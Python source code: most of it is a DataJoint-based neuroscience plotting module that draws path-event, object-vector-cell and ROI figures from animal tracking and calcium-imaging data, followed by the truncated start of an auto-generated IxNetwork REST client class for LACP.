            ATTR_PATHEVENT.append(self.ANIMAL_NAME)
            ATTR_PATHEVENT.append(self.TIMESTAMP)
        else:
            raise NameError(f'Keyword "{hash_or_animal}" not recognized')
        # Display a score?
        if display_score is not None and isinstance(display_score, str):
            ATTR_PATHEVENT.append(display_score)
        else:
            display_score = None
        if draw_speed:
            ATTR_PATHEVENT.append('speed')
        if draw_hd or draw_angle:
            ATTR_PATHEVENT.append('head_angle')
        # Check attributes in datajoint join
        if not self.__check_join_integrity(ATTR_PATHEVENT):
            raise KeyError('One or more of these were not found: {}'.format(ATTR_PATHEVENT))
        ###########################################################################
        ############### START PLOTTING FUNCTIONS
        plot_counter = 0
        # Iterate over explicit keys if given, otherwise over the join itself.
        if self.keys is not None:
            iterator = self.keys
            use_keys = True
        else:
            iterator = self.dj_object
            use_keys = False
        if self.total is not None:
            total = self.total
        else:
            total = len(iterator)
        # An externally supplied axis only makes sense for a single plot.
        if (ax is not None) and (total > 1):
            raise NotImplementedError(f'Axis was given, and total number of plots = {total}.\
            \nMake sure you have only one element to plot!')
        elif ax is not None:
            external_axis = True
        elif ax is None:
            external_axis = False
        # Make loop with tqdm progress bar
        tqdm_iterator = self.__tqdm_iterator(iterator, total-1, 'Drawing path-event plots')
        if not external_axis:
            figure = self.__create_figure_grid
        for no, key in tqdm_iterator:
            if no == total:
                # Requested number of plots reached: flush partially filled
                # figure (save or show) and stop the iterator cleanly.
                if (plot_counter > 0) and not external_axis:
                    if self.save_path is not None:
                        print('Saving figure under {}'.format(str(self.save_path)))
                        if plot_counter < 2:
                            # Show the actual cell ids in export path
                            export_name = f'pathevent {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
                        else:
                            export_name = f'pathevent n={plot_counter}.{self.save_format}'
                        figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
                    else:
                        plt.show()
                # Premature stop? Make sure you close things gracefully:
                tqdm_iterator.refresh()
                tqdm._instances.clear()
                break
            # Use keys or join object?
            if use_keys:
                entry = (self.dj_object & key).fetch1()
            else:
                entry = key
            plot_counter +=1
            if not external_axis:
                ax = figure.add_subplot(5,5,plot_counter)
            # Check for custom styling
            # NOTE(review): this overwrites a caller-supplied `event_color`
            # kwarg whenever a style sheet is active - confirm this is intended.
            if self.style in styles:
                path_color = styles[self.style].get('path_color', PATH)
                path_event_color = styles[self.style].get('path_event_color', PATH_EVENT)
                path_event_hd_color = styles[self.style].get('path_event_hd_color', PATH_EVENT_HD)
                event_color = styles[self.style].get('event_color', EVENT)
            else:
                path_color = PATH
                path_event_color = PATH_EVENT
                path_event_hd_color = PATH_EVENT_HD
                event_color = EVENT
            if not draw_events:
                # Path only: dot size encodes speed (optional), dot color
                # encodes head angle (optional).
                ax.scatter(entry['x_pos'], entry['y_pos'],
                        s=[path_dot_size if not draw_speed else (entry['speed']/np.percentile(entry['speed'],95))/speed_scaler],
                        c=[[path_color] if not any([draw_angle, draw_hd]) else make_circular_colormap(entry['head_angle'], cmap=cmap)][0],
                        lw=0,
                        alpha=alpha_path)
            else:
                # Skip cells without any signal samples.
                if not len(entry['x_pos_signal']):
                    continue
                ax.scatter(entry['x_pos'], entry['y_pos'],
                        s=[path_dot_size if not draw_speed else (entry['speed']/np.percentile(entry['speed'],95))/speed_scaler],
                        c=[path_event_color if not draw_hd else path_event_hd_color][0],
                        lw=0,
                        alpha=alpha_path)
                # Event coloring: head direction and time encoding are
                # mutually exclusive.
                assert (np.array([draw_hd, draw_time]) == True).all() == False, 'Draw time and hd are both true - choose one'
                if draw_hd:
                    colors_events = make_circular_colormap(entry['head_angle_signal'],
                                                           cmap=cmap)
                elif draw_time:
                    indices_signal = get_signal_indices(entry['x_pos_signal'],
                                            entry['x_pos'])
                    colors_events = make_linear_colormap(indices_signal,
                                            reference_numbers=np.arange(len(entry['x_pos'])),
                                            cmap=cmap)
                else:
                    colors_events = [[event_color] if isinstance(event_color,list) else event_color][0]
                # Draw signal ...
                # Dot size scales with signal strength (95th percentile norm).
                scaled_signal = (entry['signal']/np.percentile(entry['signal'],95))*event_scaler
                ax.scatter(entry['x_pos_signal'],
                           entry['y_pos_signal'],
                           s=scaled_signal,
                           c=colors_events,
                           lw=0,
                           alpha=alpha_events)
            ax.set_aspect('equal')
            ax.autoscale(enable=True, tight=True)
            ax.invert_yaxis()
            ax.get_xaxis().set_ticks([]);ax.get_yaxis().set_ticks([])
            if display_title:
                title = self.__title(entry, display_score, hash_or_animal, show_cell=draw_events)
                ax.set_title(title)
            sns.despine(left=True, bottom=True)
            if plot_counter >= self.plots_per_view:
                # Grid is full: save or show, then start a fresh figure.
                if (self.save_path is not None) and not external_axis:
                    print('Saving figure under {}'.format(str(self.save_path)))
                    if plot_counter < 2:
                        # Show the actual cell ids in export path
                        if not draw_events:
                            export_name = f'path {key["recording_name"]}.{self.save_format}'
                        else:
                            export_name = f'pathevent {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
                    else:
                        if not draw_events:
                            export_name = f'path n={plot_counter}.{self.save_format}'
                        else:
                            export_name = f'pathevent n={plot_counter}.{self.save_format}'
                    figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
                else:
                    plt.show()
                plot_counter = 0
                # Create next figure
                if not external_axis:
                    figure = self.__create_figure_grid
        return
def path_event_ov(self, **kwargs):
    '''
    SPECIAL!
    - This function gets data for each session
    Plot path-event plots for object vector (ov) cells (1x3):
    - base_session
    - object1_session
    - object2_session
    Parameters
    ----------
    **kwargs:
        cmap : string
            Valid matplotlib colormap string
            https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
            or https://github.com/1313e/CMasher
        hash_or_animal: string
            'hash' or 'animal'
            Determines whether session name (hash) or animal/timestamp
            combination should be displayed in title of each subplot.
            Defaults to 'animal'
        display_score : string
            Name of the score (=column name) to display in title
            of each subplot.
            Defaults to None.
        draw_events : bool
            Show events?
        draw_speed : bool
            Encode speed in size of dots in path plot?
        path_dot_size : int (float)
            If draw_speed==False: Dot size for tracking
        draw_hd : bool
            Encode angle in color of dots in plot?
            If draw_events==False this will color the path plot
            If draw_events==True this will color the events
        speed_scaler : float
            How much smaller than actual speed should dot size be?
        event_scaler : float
            How much smaller than actual event size should the dot be?
        event_color : list/string
            Valid color for events; defaults to 'k'
        alpha_path : float
        alpha_events : float
        display_title : bool
            Show title?
    '''
    # Process kwargs
    cmap = kwargs.get('cmap', 'magma')
    cmap = plt.get_cmap(cmap)
    display_score = kwargs.get('display_score', None)
    hash_or_animal = kwargs.get('hash_or_animal', 'animal')
    draw_events = kwargs.get('draw_events',True)
    draw_speed = kwargs.get('draw_speed', False)
    path_dot_size = kwargs.get('path_dot_size', 1.2)
    draw_hd = kwargs.get('draw_hd', False)
    speed_scaler = kwargs.get('speed_scaler', .5)
    event_scaler = kwargs.get('event_scaler', 80)
    event_color = kwargs.get('event_color',EVENT)
    alpha_path = kwargs.get('alpha_path', 1)
    alpha_events = kwargs.get('alpha_events', .7)
    display_title = kwargs.get('display_title', True)
    # Work on a copy so the class-level attribute list is not mutated.
    ATTR_PATHEVENT_OV = self.ATTR_PATHEVENT_OV.copy()
    # Display session hash or animal_name/timestamp?
    if hash_or_animal == 'hash':
        ATTR_PATHEVENT_OV.append(self.RECORDING_HASH_OV)
    elif hash_or_animal == 'animal':
        ATTR_PATHEVENT_OV.append(self.ANIMAL_NAME)
        ATTR_PATHEVENT_OV.append(self.TIMESTAMP)
    else:
        raise NameError(f'Keyword "{hash_or_animal}" not recognized')
    # Display a score?
    if display_score is not None and isinstance(display_score, str):
        ATTR_PATHEVENT_OV.append(display_score)
    else:
        # Non-string values are silently ignored.
        display_score = None
    # Check attributes in datajoint join
    if not self.__check_join_integrity(ATTR_PATHEVENT_OV):
        raise KeyError('One or more of these were not found: {}'.format(ATTR_PATHEVENT_OV))
    ###########################################################################
    ############### START PLOTTING FUNCTIONS
    # Iterate over pre-selected keys when given, otherwise over the join itself.
    if self.keys is not None:
        iterator = self.keys
        use_keys = True
    else:
        iterator = self.dj_object
        use_keys = False
    if self.total is not None:
        total = self.total
    else:
        total = len(iterator)
    # Make loop with tqdm progress bar
    # NOTE(review): the progress bar is created with total-1 while the loop
    # breaks at no == total — presumably intentional; confirm.
    tqdm_iterator = self.__tqdm_iterator(iterator, total-1, 'Drawing path-event plots')
    for no, key in tqdm_iterator:
        if no == total:
            # Premature stop? Make sure you close things gracefully:
            tqdm_iterator.refresh()
            tqdm._instances.clear()
            plt.close()
            break
        # Use keys or join object?
        if use_keys:
            entry = (self.dj_object & key).fetch1()
        else:
            entry = key
        # Get session dictionary object vector
        recording_dict = make_multi_recording_object_dict(entry)
        recording_dict = _get_ovc_tracking_signal(recording_dict, entry) # Returns tracking and signal
        if recording_dict['object1']['recording_name'] == recording_dict['object2']['recording_name']:
            # NOTE(review): two_object_sess is set but not read afterwards.
            two_object_sess = True # This is a "special case" -> 2 objects in one session
            figure = self.__create_figure_grid_ov_2
            ax_base = figure.add_subplot(1,2,1)
            ax_object1 = figure.add_subplot(1,2,2)
            axes = [ax_base, ax_object1]
            sessions = ['base', 'object1']
        else:
            # 2 separate object sessions
            two_object_sess = False
            figure = self.__create_figure_grid_ov_3
            ax_base = figure.add_subplot(1,3,1)
            ax_object1 = figure.add_subplot(1,3,2)
            ax_object2 = figure.add_subplot(1,3,3)
            axes = [ax_base, ax_object1, ax_object2]
            sessions = ['base', 'object1', 'object2']
        # Check for custom styling
        # Style entries override the module-level color constants.
        if self.style in styles:
            path_color = styles[self.style].get('path_color', PATH)
            path_event_color = styles[self.style].get('path_event_color', PATH_EVENT)
            path_event_hd_color = styles[self.style].get('path_event_hd_color', PATH_EVENT_HD)
            event_color = styles[self.style].get('event_color', EVENT)
        else:
            path_color = PATH
            path_event_color = PATH_EVENT
            path_event_hd_color = PATH_EVENT_HD
            event_color = EVENT
        # Get subplot title
        # NOTE(review): this title is recomputed (without show_cell) in the
        # display_title branch below, so this first call is effectively unused.
        title = self.__title(entry, display_score, hash_or_animal, show_cell=draw_events, ov=True)
        for ax, session in zip(axes, sessions):
            if not draw_events:
                # Path only: dot size optionally encodes speed, color optionally
                # encodes head direction.
                ax.scatter(recording_dict[session]['tracking']['x_pos'],
                           recording_dict[session]['tracking']['y_pos'],
                           s=[path_dot_size if not draw_speed else \
                              (recording_dict[session]['tracking']['speed']/np.percentile(recording_dict[session]['tracking']['speed'],95))/speed_scaler],
                           c=[[path_color] if not draw_hd else make_circular_colormap(recording_dict[session]['tracking']['head_angle'], cmap=cmap)][0],
                           lw=0,
                           alpha=alpha_path)
            else:
                # Path as background, events (signal) drawn on top below.
                ax.scatter(recording_dict[session]['tracking']['x_pos'],
                           recording_dict[session]['tracking']['y_pos'],
                           s=[path_dot_size if not draw_speed else (recording_dict[session]['tracking']['speed']/np.percentile(recording_dict[session]['tracking']['speed'],95))/speed_scaler],
                           c=[path_event_color if not draw_hd else path_event_hd_color][0],
                           lw=0,
                           alpha=alpha_path)
                if draw_hd:
                    colors_events = make_circular_colormap(recording_dict[session]['signal']['head_angle_signal'])
                else:
                    colors_events = [[event_color] if isinstance(event_color,list) else event_color][0]
                # Draw signal ...
                # Dot size scales with signal amplitude, normalized to its
                # 95th percentile.
                scaled_signal = (recording_dict[session]['signal']['signal']/np.percentile(recording_dict[session]['signal']['signal'],95))*event_scaler
                ax.scatter(recording_dict[session]['signal']['x_pos_signal'], recording_dict[session]['signal']['y_pos_signal'],
                           s=scaled_signal,
                           c=colors_events,
                           lw=0,
                           alpha=alpha_events)
            ax.set_aspect('equal')
            ax.autoscale(enable=True, tight=True)
            # Image-style convention: y axis grows downwards.
            ax.invert_yaxis()
            ax.get_xaxis().set_ticks([]);ax.get_yaxis().set_ticks([])
        # Add title
        if display_title:
            # Get subplot title
            title = self.__title(entry, display_score, hash_or_animal, ov=True)
            ax_base.set_title(title)
        sns.despine(left=True, bottom=True)
        plt.tight_layout()
        if self.save_path is not None:
            print('Saving figure under {}'.format(str(self.save_path)))
            export_name = f'pathevent ov {key["base_session"]} cell {key["cell_id"]}.{self.save_format}'
            figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
        else:
            plt.show()
    return
def rois(self, **kwargs):
    '''
    Plot ROIs
    Parameters
    ----------
    **kwargs:
        cmap : string
            Valid matplotlib colormap string
            https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
            or https://github.com/1313e/CMasher
        invert_img_cmap: bool
            For image to plot, invert grey scale colormap?
        hash_or_animal : string
            'hash' or 'animal'
            Determines whether session name (hash) or animal/timestamp
            combination should be displayed in title.
            Defaults to 'animal'
        color_mapping : string
            Name of the attribute (=column name) to generate colors over
            Defaults to None.
        draw_image : bool
            Draw the max image? Defaults to False.
        image_key : string
            Key of image to plot. Defaults to 'max_image'.
        percentile : float
            Percentile where to cap the colormap for image display
            (e.g. 99. will compress the image into 0 to 99th percentile of its values)
            This is useful for bringing out dim details that would otherwise be
            overshadowed by other, brighter details; it washes out details though
        draw_centers : bool
            Draw the center points? Defaults to True.
        draw_numbers : bool
            Draw label on top of the cells (cell index)?
            Defaults to False.
        draw_pixels : bool
            Draw all pixels of extracted cells.
            Defaults to False.
        draw_outlines : bool
            Draw ROI outlines?
            Defaults to False.
        text_color : string
            Color of label text. Defaults to 'k' (black).
        fontsize : float
            Font size for annotations (default: 15.)
        dot_color : string
            Color of cell center dots. Defaults 'k'.
        dot_size : int
            Size of all drawn dots (global for all scatter plots).
            Defaults to 5.
        alpha : float
            Transparency (0-1) of dots (global for all scatter plots).
            Defaults to .8.
        colors : color array with color for every cell.
            Use this to color code cells according to certain properties.
            Defaults to random color palette based on husl only if 'color_mapping'
            attribute is not set.
        scalebar : float
            Display scalebar of defined length [microns]
        return_axes : bool
            Return axes if True
        return_figure : bool
            Return figure object if True (and plot).
            This is overridden if return_axes = True
        display_title : bool
            Show title?
        ax : axis
            Matplotlib axis to draw into
        path_suffix : string
            Appendix for filename, like _animalxy, default: empty string
        despine : bool
            Whether to show axes or not (seaborn despine), default: True
    '''
    # Process kwargs
    cmap = kwargs.get('cmap', 'magma')
    # .colors: extract the color list from the (listed) colormap.
    cmap = plt.get_cmap(cmap).colors
    invert_img_cmap= kwargs.get('invert_img_cmap', False)
    hash_or_animal = kwargs.get('hash_or_animal', 'animal')
    color_mapping = kwargs.get('color_mapping', None)
    draw_image = kwargs.get('draw_image', False)
    image_key = kwargs.get('image_key', 'max_image')
    percentile = kwargs.get('percentile', None)
    draw_centers = kwargs.get('draw_centers', True)
    draw_numbers = kwargs.get('draw_numbers', False)
    draw_pixels = kwargs.get('draw_pixels', False)
    draw_outlines = kwargs.get('draw_outlines', False)
    text_color = kwargs.get('text_color', ROI_TEXT_COLOR)
    fontsize = kwargs.get('fontsize', 15.)
    dot_color = kwargs.get('dot_color', ROI_DOT_COLOR)
    dot_size = kwargs.get('dot_size', 5)
    alpha = kwargs.get('alpha', .8)
    colors = kwargs.get('colors', None)
    scalebar = kwargs.get('scalebar', None)
    return_axes = kwargs.get('return_axes',False)
    return_figure = kwargs.get('return_figure',False)
    display_title = kwargs.get('display_title', True)
    ax = kwargs.get('ax', None)
    path_suffix = kwargs.get('path_suffix', '')
    despine = kwargs.get('despine', True)
    # Sanity checks
    if scalebar is not None:
        # NOTE(review): the {} placeholder in this message is never filled in.
        assert scalebar > 1.,'Given scalebar length ({}) is too small'
    def __iscorr():
        # Find out if we are dealing with "corr" corrected
        # table output or non-corrected (raw) output
        # Listens for the keyword _corr in SQL query after "FROM".
        # (Assumes 'SomethingCorr' as table name)
        sql = self.dj_object.make_sql()
        return '_corr' in sql.split('FROM')[1]
    def __dataset_name():
        # Sometimes the attribute 'dataset_name' gets renamed to 'signal_dataset'
        if 'signal_dataset' in self.__attributes:
            return 'signal_dataset'
        else:
            return 'dataset_name'
    # Prepare list of attributes to check
    # Find out if we are handling unwarped (corr) or raw data
    # and pick the matching column-name set.
    if __iscorr():
        ATTR_ROIS = self.ATTR_ROIS_CORR.copy()
        # Force the '_corr' suffix onto the image key.
        image_key = [image_key + '_corr' if '_corr' not in image_key else image_key][0]
        CENTER_X = 'center_x_corr'
        CENTER_Y = 'center_y_corr'
        PIXELS_X = 'xpix_corr'
        PIXELS_Y = 'ypix_corr'
        XLIM = 'x_range_microns_eff'
        YLIM = 'y_range_microns_eff'
        LAMBDA = 'lambda_corr'
    else:
        ATTR_ROIS = self.ATTR_ROIS.copy()
        # Strip any '_corr' suffix off the image key.
        image_key = [image_key.split('_corr')[0] if '_corr' in image_key else image_key][0]
        CENTER_X = 'center_x'
        CENTER_Y = 'center_y'
        PIXELS_X = 'xpix'
        PIXELS_Y = 'ypix'
        XLIM = 'x_range'
        YLIM = 'y_range'
        LAMBDA = 'lambda'
    # Display session hash or animal_name/timestamp?
    if hash_or_animal == 'hash':
        ATTR_ROIS.append(self.RECORDING_HASH)
    elif hash_or_animal == 'animal':
        ATTR_ROIS.append(self.ANIMAL_NAME)
        ATTR_ROIS.append(self.TIMESTAMP)
    else:
        raise NameError(f'Keyword "{hash_or_animal}" not recognized')
    if color_mapping is not None:
        ATTR_ROIS.append(color_mapping)
    ATTR_ROIS.append(image_key)
    # Check attributes in datajoint join
    if not self.__check_join_integrity(ATTR_ROIS):
        raise KeyError('One or more of these were not found: {}'.format(ATTR_ROIS))
    ###########################################################################
    ############### START PLOTTING FUNCTIONS
    if self.keys is not None:
        iterator = self.keys
    else:
        iterator = self.dj_object
    # Check if there is more than one imaging analysis dataset available
    # If this is true, then multiple sessions are returned and this function
    # cannot be used
    if len(set(iterator.fetch(__dataset_name()))) != 1:
        raise KeyError('More than one dataset found (indicating multiple results)')
    # Take care of color palette
    if colors is None:
        # No color array given
        # Generate either over "color_mapping" attribute
        # (take whole session as basis, no matter what)
        # or random (over 'cell_ids')
        if color_mapping is not None:
            colors = make_linear_colormap(iterator.fetch(color_mapping),
                                          reference_numbers=self.dj_object.fetch(color_mapping),
                                          cmap=cmap)
        else:
            # "random"
            colors = make_linear_colormap(iterator.fetch('cell_id'), cmap=cmap)
    else:
        # Check integrity
        if len(colors) != len(iterator):
            raise IndexError('Color length does not match length of datajoint results')
    # Make loop with tqdm progress bar
    # In this case it is just a very small "package" since most of the data will be pre-fetched
    tqdm_iterator = self.__tqdm_iterator(iterator.proj(), len(iterator), 'Drawing ROIs')
    # Before looping, pre-fetch large results: CENTER_X, CENTER_Y, PIXELS_X, PIXELS_Y etc
    pixel_data = pd.DataFrame(self.dj_object.fetch('KEY', *ATTR_ROIS, as_dict=True))
    pixel_data.set_index('cell_id', inplace=True)
    # NOTE(review): equivalent to `external_axis = ax is not None`.
    if ax is not None:
        external_axis = True
    elif ax is None:
        external_axis = False
    # Check for custom styling
    # These overwrite the keyword arguments for this function
    if self.style in styles:
        text_color = styles[self.style].get('roi_text_color', text_color)
        dot_color = styles[self.style].get('roi_dot_color', dot_color)
    # Figure
    if not external_axis:
        figure = self.__create_figure_single
        ax = figure.add_subplot(111)
    # Loop over cells and draw
    for no, key in tqdm_iterator:
        entry = pixel_data.loc[key['cell_id']]
        if no == 0:
            # First iteration only: title and background image (shared by all cells).
            # Get figure title
            title = self.__title(entry, color_mapping, hash_or_animal, show_cell=False)
            if display_title:
                ax.set_title(title)
            # Plot image
            image_ = ax.imshow(entry[image_key],
                               cmap=['gist_gray' if not invert_img_cmap else 'gist_gray_r'][0],
                               vmin=np.nanmin(entry[image_key]),
                               vmax=[np.nanmax(entry[image_key]) if percentile is None else np.nanpercentile(entry[image_key], percentile)][0],
                               )
            if not draw_image: image_.remove() # Need to draw it anyway first!
        if draw_pixels:
            # Per-pixel RGBA: one base color per cell, alpha weighted by the
            # (shifted, normalized) lambda values.
            npixels = len(entry[PIXELS_X])
            rgba_colors = np.broadcast_to(colors[no],(npixels,3))
            rgba_colors = np.hstack((rgba_colors, np.zeros((npixels,1))))
            lambdas = entry[LAMBDA].copy()
            lambdas = np.nan_to_num(lambdas)
            if np.min(lambdas) < 0:
                # Shift so all lambdas are non-negative before normalizing.
                lambdas += np.abs(np.min(lambdas))
            # Normalize alpha values
            norm_alpha_px = lambdas / lambdas.max()
            rgba_colors[:, 3] = norm_alpha_px
            #print(rgba_colors)
            ax.scatter(entry[PIXELS_X], entry[PIXELS_Y], s=dot_size, lw=0, color=rgba_colors, marker='o')
        if draw_centers:
            ax.scatter(entry[CENTER_X],entry[CENTER_Y], s=dot_size, lw=1.5, c=[colors[no] if not draw_pixels else dot_color], alpha=alpha)
        if draw_numbers:
            # .name holds the index and it was set to 'cell_id' above
            ax.text(entry[CENTER_X], entry[CENTER_Y],f'{entry.name}', color=text_color, \
                    ha='center', va='center',\
                    fontsize=fontsize)
        if draw_outlines:
            # Rasterize the ROI mask, blur it slightly, then keep the ring of
            # pixels whose distance-transform value equals exactly 1 — a thin outline.
            zero_image = np.zeros_like(entry[image_key])
            zero_image[entry[PIXELS_Y], entry[PIXELS_X]] = 1
            zero_image = gaussian(zero_image, sigma=.15, mode='nearest', preserve_range=True, truncate=4.0)
            distance = distance_transform_edt(zero_image)
            distance[distance != 1] = 0
            outline = np.where(distance == 1)
            ax.scatter(outline[1],outline[0], s=dot_size/10, c=[colors[no] if not draw_pixels else dot_color], alpha=alpha, marker='o')
    # Take care of axes styling
    # (entry still holds the last fetched row; XLIM/YLIM are per-session and
    # identical across cells since a single dataset was enforced above)
    ax.axes.get_xaxis().set_visible(False)
    ax.axes.get_yaxis().set_visible(False)
    ax.set_xlim(entry[XLIM])
    ax.set_ylim(entry[YLIM][::-1])
    # Display scale bar?
    if scalebar is not None:
        # Draw scalebar in bottom right corner with some margin
        if not draw_image:
            color_scalebar = 'k'
        else:
            color_scalebar = 'w'
        ax.plot([np.max(entry[XLIM])-scalebar-5,
                 np.max(entry[XLIM])-scalebar-5+scalebar],
                [np.max(entry[YLIM])-5,
                 np.max(entry[YLIM])-5],
                lw=4, color=color_scalebar,
                alpha=.95, solid_capstyle='butt')
    sns.despine(left=despine, right=despine, bottom=despine, top=despine)
    if (self.save_path is not None) and not external_axis:
        print('Saving figure under {}'.format(str(self.save_path)))
        figure.savefig(self.save_path / f'rois {title.split("|")[0]}{path_suffix}.{self.save_format}', dpi=300, bbox_inches='tight')
    if return_axes:
        return ax
    if return_figure:
        return figure
########################################################################################################################################################################################################################
########################################################################################################################################################################################################################
### HELPERS
def _get_ovc_tuningmaps(recording_dict, key):
    '''
    Helper for tuningmaps_ov
    - Fetch tuningmaps
    - Object position in tuningmap coordinates

    Parameters
    ----------
    recording_dict : dict
        Session dict with 'base', 'object1', 'object2' entries
        (see make_multi_recording_object_dict); mutated in place.
    key : dict
        DataJoint restriction dict; dataset/order attributes are removed
        from it in place before restricting the tables.

    Returns
    -------
    tuple (recording_dict, max_rm)
        The mutated recording_dict and the maximum of the per-session
        99th-percentile tuningmap values (shared color scale).
    '''
    fill_value = 0 # or np.nan
    # Remove attributes that would over-restrict the joins below.
    # dict.pop with a default replaces the previous try/except-KeyError pattern.
    for key_ in ['dataset_name', 'recording_order', 'signal_dataset', 'tracking_dataset']:
        key.pop(key_, None)
    rm, mask = (Ratemap & recording_dict['base'] & key).fetch1('tuningmap','mask_tm')
    tuningmap = np.ma.array(rm, mask=mask).filled(fill_value=fill_value)
    recording_dict['base']['tuningmap'] = tuningmap
    for session in ['object1', 'object2']:
        # Get fields and object position (in tuningmap coordinates)
        rm, mask = (Ratemap & recording_dict[session] & key).fetch1('tuningmap','mask_tm')
        tuningmap = np.ma.array(rm, mask=mask).filled(fill_value=fill_value)
        # Take care of objects / positions
        try:
            obj_x, obj_y = (ArenaObjectPos & recording_dict[session] & key).fetch1('obj_x_coord_calib','obj_y_coord_calib')
        except dj.DataJointError:
            # fetch1 failed => more than one object row; pick the row matching
            # the session slot (object1 -> first row, object2 -> second row).
            obj = (ArenaObjectPos & recording_dict[session] & key).fetch('obj_x_coord_calib','obj_y_coord_calib', as_dict=True)
            idx = 0 if session == 'object1' else 1
            obj_x, obj_y = obj[idx]['obj_x_coord_calib'], obj[idx]['obj_y_coord_calib']
        x_edges, y_edges = (Occupancy & recording_dict[session] & key).fetch1('x_edges','y_edges')
        # ... Where is the object in tuningmap "coordinates" (bins)?
        # Subtract .5 to land in the center of the bin.
        bin_size_rm_x = np.mean(np.diff(x_edges))
        bin_size_rm_y = np.mean(np.diff(y_edges))
        obj_x_rm = ((obj_x - x_edges[0]) / bin_size_rm_x) - .5
        obj_y_rm = ((obj_y - y_edges[0]) / bin_size_rm_y) - .5
        recording_dict[session]['tuningmap'] = tuningmap
        recording_dict[session]['object_x'] = obj_x
        recording_dict[session]['object_y'] = obj_y
        recording_dict[session]['object_x_rm'] = obj_x_rm
        recording_dict[session]['object_y_rm'] = obj_y_rm
    # Shared color scale: max over the per-session 99th percentiles
    max_rm = [np.nanpercentile(recording_dict[session]['tuningmap'], 99)
              for session in ['base', 'object1', 'object2']]
    return recording_dict, np.nanmax(max_rm)
def _get_ovc_tracking_signal(recording_dict, key):
    '''
    Helper for path_event_ov
    - Fetch tracking and signal
    - Object positions

    Parameters
    ----------
    recording_dict : dict
        Session dict with 'base', 'object1', 'object2' entries; mutated in place.
    key : dict
        DataJoint restriction dict; dataset/order attributes are removed
        from it in place before restricting the tables.

    Returns
    -------
    dict
        The mutated recording_dict with 'tracking'/'signal' per session and
        'object_x'/'object_y' for the object sessions.
    '''
    # Remove attributes that would over-restrict the joins below.
    # dict.pop with a default replaces the previous try/except-KeyError pattern.
    for key_ in ['dataset_name', 'recording_order', 'signal_dataset', 'tracking_dataset']:
        key.pop(key_, None)
    # Base session: tracking + signal only (no object position).
    recording_dict['base']['tracking'] = (Tracking.OpenField & recording_dict['base'] & key).fetch1()
    recording_dict['base']['signal'] = (SignalTracking & recording_dict['base'] & key).fetch1()
    for session in ['object1', 'object2']:
        recording_dict[session]['tracking'] = (Tracking.OpenField & recording_dict[session] & key).fetch1()
        recording_dict[session]['signal'] = (SignalTracking & recording_dict[session] & key).fetch1()
        # Take care of objects / positions
        try:
            obj_x, obj_y = (ArenaObjectPos & recording_dict[session] & key).fetch1('obj_x_coord_calib','obj_y_coord_calib')
        except dj.DataJointError:
            # fetch1 failed => more than one object row; pick the row matching
            # the session slot (object1 -> first row, object2 -> second row).
            obj = (ArenaObjectPos & recording_dict[session] & key).fetch('obj_x_coord_calib','obj_y_coord_calib', as_dict=True)
            idx = 0 if session == 'object1' else 1
            obj_x, obj_y = obj[idx]['obj_x_coord_calib'], obj[idx]['obj_y_coord_calib']
        recording_dict[session]['object_x'] = obj_x
        recording_dict[session]['object_y'] = obj_y
    return recording_dict
def draw_vector_map(masked_histogram, radial_bins_hist, angular_bins_hist):
    '''
    Draw single vector map (Object vector cell related)

    masked_histogram : np masked array
    radial_bins_hist : list (list(physt.special_histograms.polar_histogram.binnings))
    angular_bins_hist : list (list(physt.special_histograms.polar_histogram.binnings))
    '''
    sns.set(style='white', font_scale=1.5)
    fig = plt.figure(figsize=(6,6))
    axis = fig.add_subplot(111)
    # Transposed so distance runs along x and angle along y
    axis.imshow(masked_histogram.T,aspect='auto')
    axis.set_xlim(0, len(radial_bins_hist))
    axis.set_ylim(0, len(angular_bins_hist))
    # Relabel the automatically generated ticks with physical units
    n_xticks = len(axis.get_xticklabels())
    n_yticks = len(axis.get_yticklabels()) - 1
    axis.set_xticklabels(np.linspace(0, radial_bins_hist[-1], n_xticks))
    angle_labels = np.round(np.degrees(np.linspace(0, angular_bins_hist[-1], n_yticks)))
    axis.set_yticklabels(angle_labels)
    sns.despine(left=True,bottom=True)
    axis.set_xlabel('Distance [mm]')
    axis.set_ylabel('Angle [degrees]')
    plt.show()
<reponame>ralfjon/IxNetwork
# Copyright 1997 - 2018 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class Lacp(Base):
    """The Lacp class encapsulates a required lacp node in the ixnetwork hierarchy.
    An instance of the class can be obtained by accessing the Lacp property from a parent instance.
    The internal properties list will contain one and only one set of properties which is populated when the property is accessed.
    """

    # Name of this node in the IxNetwork server-side data model (SDM).
    _SDM_NAME = 'lacp'

    def __init__(self, parent):
        super(Lacp, self).__init__(parent)

    @property
    def LearnedInfo(self):
        """An instance of the LearnedInfo class.
        Returns:
            obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lacp.learnedinfo.learnedinfo.LearnedInfo)
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        # Imported lazily inside the property — presumably to avoid import
        # cycles in the generated package (NOTE(review): confirm).
        from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lacp.learnedinfo.learnedinfo import LearnedInfo
        return LearnedInfo(self)

    @property
    def Link(self):
        """An instance of the Link class.
